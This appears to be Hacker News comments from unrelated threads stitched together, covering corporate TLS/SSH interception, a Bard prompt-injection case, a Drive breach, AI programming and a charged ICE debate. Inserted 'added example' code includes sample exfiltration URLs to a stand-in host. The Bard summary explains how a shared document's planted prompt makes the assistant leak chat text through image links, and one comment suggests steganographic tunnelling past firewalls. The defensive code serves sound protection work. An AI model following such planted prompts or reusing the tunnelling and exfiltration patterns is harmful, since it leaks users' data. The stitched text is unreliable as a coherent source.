I don't think a modern firewall can MiTM HTTPS TLS without triggering a "Warning: Potential Security Risk Ahead" (Firefox) or "Your connection is not private" (Chrome).
I don't think _any_ firewall can MITM traffic without this happening unless you install the appropriate certificate in each client machine's trust store. I bet that with the advent of such all-in-one solutions as Fortinet or Cisco VPNs this would be handled automatically. If not, I'm sure an endpoint management solution could be coaxed into doing this via some glue scripts. I haven't been an "IT guy" in a decade-plus but I'd be surprised if this wasn't within reach fairly easily these days.
Yeah, that's what the IT at my company did. Installed Zscaler, rolled out a new root cert to Chrome, and then told people to configure the remaining apps they use to use the organization's root cert.
Which is why corporates who do this also use MDM to ensure that certs for the firewall/reverse proxy are installed on endpoints, RADIUS at network access points to authenticate devices by certificates and endpoint protection software to send nasty-grams if you fuck around.
That’s been my experience. The difference being in a corporate environment they can push policies to all employee endpoints that make this happen with no scary warning (trust the internal CA, etc).
Regarding SSH, the MitM would generate a new host key for the actual host you try to connect to, meaning that when the MitM existed in the first place and you trusted the host key then (adding it to your known_hosts), you will not get any additional security warning.
This can of course be avoided by the organization by distributing host keys to the client beforehand as they (maybe) would if the host keys were the actual keys from the host stored in /etc/ssh.
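The trust-on-first-use gap described in the two comments above, and the effect of pre-distributed host keys, as an added example that is not part of the original thread: it checks a presented key against a known_hosts file, including OpenSSH's hashed host entries. Hostnames, key bytes and the salt are constructed.

```python
import base64
import hashlib
import hmac
import struct


def ed25519_blob(raw32: bytes) -> bytes:
    """SSH wire encoding of an Ed25519 public key (two length-prefixed strings)."""
    return b"".join(struct.pack(">I", len(s)) + s for s in (b"ssh-ed25519", raw32))


def hash_host(host: str, salt: bytes) -> str:
    """Hashed host field: |1|b64(salt)|b64(HMAC-SHA1(key=salt, msg=host))."""
    mac = hmac.new(salt, host.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % tuple(base64.b64encode(x).decode() for x in (salt, mac))


def host_matches(field: str, host: str) -> bool:
    """Exact-name match only; wildcards and [host]:port are not handled."""
    if field.startswith("|1|"):
        salt = base64.b64decode(field.split("|")[2])
        return hmac.compare_digest(hash_host(host, salt), field)
    return host in field.split(",")


def check_host_key(known_hosts: str, host: str, presented: bytes) -> str:
    """'match', 'mismatch' (another key is pinned) or 'unknown' (the TOFU case)."""
    verdict = "unknown"
    for line in known_hosts.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0][0] in "#@":
            continue  # blanks, comments, @cert-authority / @revoked markers
        if host_matches(parts[0], host):
            if base64.b64decode(parts[2]) == presented:
                return "match"
            verdict = "mismatch"
    return verdict


# Constructed sample data: hostnames and key bytes are not real.
GENUINE = ed25519_blob(bytes(range(32)))
INTERCEPTOR = ed25519_blob(bytes(range(32, 64)))
B64 = base64.b64encode(GENUINE).decode()
KNOWN_HOSTS = "\n".join([
    "# pre-distributed by the organisation",
    "build.internal.example ssh-ed25519 " + B64,
    hash_host("db.internal.example", b"constructed-salt-20b") + " ssh-ed25519 " + B64,
])
```

A host with no entry returns `unknown`, which is the situation where a client would silently learn whatever key it is shown first; hosts with a pinned key return `mismatch` when an interception device presents its own key.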
Correct. Companies that implement such a firewall must also install their own trust stores on the machines on the network. This can be a problem when you try to use some software that uses its own trust store from a public source like Mozilla (e.g. Python libraries).
It really makes you think how much your security hinges on that trust store yet it's something most people aren't even aware exists, let alone inspected themselves.
Pretty sure you still can, it just requires that the client system trusts the CA being used to sign the MITM certs. That obviously limits the cases where it works, but not to zero.
I don't for a moment believe that that's the reason (more likely, it's the apps trying to prevent reverse engineering), but yes, there's a bit of a cat/mouse game where you can read traffic but HTTPS prevents that but you can add a custom CA but apps can pin certs but you can modify the app to fix that. But I suspect that for the appliance case, a business can just require that the vendor allow a custom CA and block any traffic they can't decrypt.
In cases where I trust both the communication endpoints, e.g. an employee trying to SSH into an internal host, "trust" being established by other parameters that are not relevant to the firewall, why would I MitM such a connection?
At work I use a VPN to access the internal network, I then have to traverse multiple firewalls and a MitM breaking up my SSH connection in order to connect to a host running a webserver.
I have yet to understand how the MitM would increase security. Extra (well minus) points if the appliance in question auto-updates from the vendor's repository, offering no insight into the inner workings.
They can pin certs, but at least you know that you can't see that traffic and make a policy decision about allowing it anyways or trying to force the vendor to drop it.
The next level is to have another layer of encryption and wrap that in the TLS/SSH, and maybe use steganography to make it appear legitimate. Much harder to detect.
That stuff fundamentally does not work against anybody with enough of a clue to be playing tunneling games (or using ssh) in the first place. If you have any significant control over both ends of the connection, then it's trivial to obfuscate anything you want so that the firewall can't detect it.
... and those boxes, all of them, have a really bad history of security bugs themselves.
The risks you're taking by undermining the cryptography and putting random unnecessary devices in positions of trust are almost always greater than the risks you mitigate. What you're really buying with those devices is the illusion of control and/or the ability to claim you "tried".
TLDR: Bard will render Markdown images in conversations. Bard can also read the contents of your Google Docs to give responses more context. By sharing a Google Doc containing a malicious prompt with a victim you could get Bard to generate Markdown image links with URL parameters containing URL-encoded sections of your conversation. These sections of the conversation can then be exfiltrated when the Bard UI attempts to load the images by reaching out to the URL the attacker had Bard previously create.
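One mitigation for the image-loading channel summarized above, as an added example that is not part of the original thread or of any vendor's code: strip Markdown images from model output unless they point at an allow-listed host, before the UI renders it. The allow-list, host names and sample output are hypothetical and constructed.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allow-list: hosts the chat UI itself serves images from.
ALLOWED_IMAGE_HOSTS = {"images.chat.example"}

# The two Markdown image syntaxes; raw HTML <img> tags are not handled here.
INLINE_IMG = re.compile(r"!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")  # ![alt](url)
REF_IMG = re.compile(r"!\[([^\]]*)\]\[([^\]]*)\]")                   # ![alt][label]
REF_DEF = re.compile(r"^\s*\[([^\]]+)\]:\s*<?(\S+?)>?\s*$", re.M)    # [label]: url


def url_allowed(url: str) -> bool:
    """Only https URLs whose exact host is on the allow-list may be rendered."""
    try:
        parts = urlsplit(url)
        return parts.scheme == "https" and parts.hostname in ALLOWED_IMAGE_HOSTS
    except ValueError:
        return False


def sanitize(markdown: str):
    """Return (text safe to render, list of image URLs that were removed)."""
    blocked = []
    refs = {m.group(1).lower(): m.group(2) for m in REF_DEF.finditer(markdown)}

    def inline(m):
        if url_allowed(m.group(2)):
            return m.group(0)
        blocked.append(m.group(2))
        return "(image removed)"

    def by_ref(m):
        url = refs.get((m.group(2) or m.group(1)).lower(), "")
        if url_allowed(url):
            return m.group(0)
        blocked.append(url)  # unresolved labels fail closed
        return "(image removed)"

    return REF_IMG.sub(by_ref, INLINE_IMG.sub(inline, markdown)), blocked


# Constructed model output shaped like the case above: conversation text in a query string.
SAMPLE = (
    "Here is your summary.\n"
    "![logo](https://images.chat.example/logo.png)\n"
    "![x](https://collector.example/p.png?q=meeting%20notes%20text)\n"
    "![y][r1]\n\n"
    "[r1]: https://collector.example/r.png?q=more%20text\n"
)
```

The returned list of blocked URLs is worth logging: an image URL with conversation text in its parameters is a signal that the model read attacker-controlled content.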
Moral of the story: be careful what your AI assistant reads, it could be controlled by an attacker and contain hypnotic suggestions.
Hopefully it'll be tightly scoped and not like, hey I need access to read/create/modify/delete all your calendar events and contacts just so I can check if you are busy.
Not everything is meant literally. When he says they ended up with $0, it doesn't have to be $0, just hugely down and nearly worthless compared to before that was doing well.
In the same way $100M could just have been $99M or even $80M, and the $0 they started with could just as well have been $20K in savings he invested.
Assuming screenshot is real[0], they have over 1PB in their Google Drive, so chances are everyone just uses Google Drive with shared drives, and employees use Drive for Desktop (previously drive file stream)[1]. Shared drives are pretty powerful and access to them can be gated at the same level as you can regular Drive files.
My theory is that some high-level IT person either got phished and didn't have hardware 2fa, or that high-level IT person downloaded malware / got RAT'd and the Google Drive scanning was done in the background on their machine. Depending on the hierarchy, it might not have even been a scan, could've been the attackers sating their curiosity by browsing through all their internal files and happening to find some PAM credentials.
Maybe just clicking around until they found something. That's what many employees do on a daily basis looking for files on network drives, so nothing that would be noticed easily.
>Anyone who can articulate their ideas in language can implement them
I'd be shocked if even 10% of the users who can't navigate a GUI could accurately describe what they want the software to do. To the user who doesn't know they can use Ctrl-Z to undo, the first half dozen times the AI mangles their inherited spreadsheet might be enough to put them off the idea.
I’ve been thinking for a while about a common people programming language able to interface with machines with pure casual conversation (not exact commands) and I feel something is coming in the next decades even if not earlier. Imagine the ability to casually chat with a widget which understands flawlessly and where most devices would be able to communicate as well. This could eventually be used in psychotherapy, everything automation around humans and in nefarious ways as well. I’m only hopeful of a human augmentation scenario but there are countless ways it could become totally different.
Certainly there is a huge middle ground. Vague, but common, use cases might have more articulate versions of the commands inferred. I find myself learning new tools all the time - I certainly have enough domain knowledge of many things to express intent without describing implementation. I suspect plenty of people are similar enough - just operating at different levels of abstraction.
What I find more concerning would be people operating under misconceptions, or being more precise than needed, thus not actually accomplishing their objective with the introduction of irrelevant detail.
This is a shockingly coherent summary. The accuracy leaves a bit to be desired, but this is perfectly usable for distilling things you don't have time to fully evaluate.
I felt the same. I read the full article. Then, I returned to HN. I was surprised to see the top post was talking about GPT-3(!). Then, I read the GPT-3 summary. I think: "Hey, not bad! This could be a real tool for everyday use!"
Please go physically visit Auschwitz, tour the grounds and museum exhibits illustrating the genuine horrors perpetuated there, and then see if your offensively ignorant misuse of the term "concentration camp" still seems appropriate to you.
I am a Jew and I have studied this and visited camps. I just visited the site of one in France. It is quite clear that needing to separate what has happened to children and families on the southern border from that which happened to, say, the Roma during the Reich is suspicious. No one will be held accountable.
History will eventually regard the imperialist behavior of the US quite negatively. This is no comparison to Hitler’s Germany but it’s intellectually dishonest to ignore that they designed the racial Nuremberg laws on Jim Crow America. Racism, segregation, and the like are an intrinsic part of American history and one of its exports.
We built concentration camps for Japanese during the war and nothing came of that either.
The border enforcement is not in and of itself imperialist. This is a bad faith engagement with what I think is a pretty clear argument.
Our border enforcement is a small piece of a much larger program of imperialism. We overthrow and destabilize central and South American governments which are not sufficiently pliant client states. Then we make a show of rejecting groups fleeing those conditions even though the vast majority of undocumented immigration does not happen via border crossing.
The current ubiquity of child abuse in the US ICE camps is shocking. However, if the bar is “not as bad as Hitler while he was losing the war”, then I agree there’s a long way to fall.
Heck, ICE doctors haven’t been caught performing forced hysterectomies for almost two years:
“Caught” is not a synonym for “unsupported anonymous allegations by immigration activists”.
It’s insulting, naive, and simply wrong to suggest an equivalence to our enforcement of immigration law on people voluntarily emigrating to the United States.